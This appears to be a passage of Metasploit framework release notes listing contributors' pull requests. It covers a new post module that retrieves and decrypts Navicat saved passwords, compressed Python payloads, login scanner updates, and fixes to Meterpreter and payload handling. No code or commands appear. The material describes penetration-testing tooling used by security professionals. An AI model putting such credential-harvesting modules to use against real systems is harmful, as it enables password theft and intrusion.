Windows Gather Navicat Passwords by HyperSine and Kali-Team – This adds a post module that retrieves and decrypts passwords saved by Navicat.
Enhancements and features (6)
#17211 from llamasoft – This compresses Python payloads using zlib to make them smaller.
#17219 from jheysel-r7 – Update Zabbix login_scanner to work with version 6.2.4.
#17223 from cgranleese-r7 – The reload_lib functionality has been updated so that its file change tracking logic better takes into account scenarios where files are modified. Previously if a breakpoint was inserted, removed, and then reload_lib -a was run, it would mistakenly use an old copy of the code.
#17234 from cgranleese-r7 – Add references to the info -d command in the options and info command outputs. This command allows you to generate an HTML document which you can use to view the full documentation of a module in your browser.
#17235 from jmartin-r7 – Updates auxiliary/scanner/http/manageengine_desktop_central_login module to report the service name correctly as http or https.
#17177 from nzdjb – A bug has been fixed when searching for or attempting to use modules whereby trailing colons (:) were not handled appropriately as part of the input, and could lead to all modules in Metasploit being returned.
#17221 from adfoster-r7 – A bug has been fixed that would cause crashes when generating payload sizes. Additionally, the code has been updated to ignore payload metadata for adaptor payloads when determining payload sizes.
#17244 from zeroSteiner – A bug that could cause the hostname command to fail in Mettle versions of Meterpreter has been addressed by adding increased validation to the hostname code.
#17220 from adfoster-r7 – This fixes a crash in the peinject stage that would occur when the PE datastore option was not set.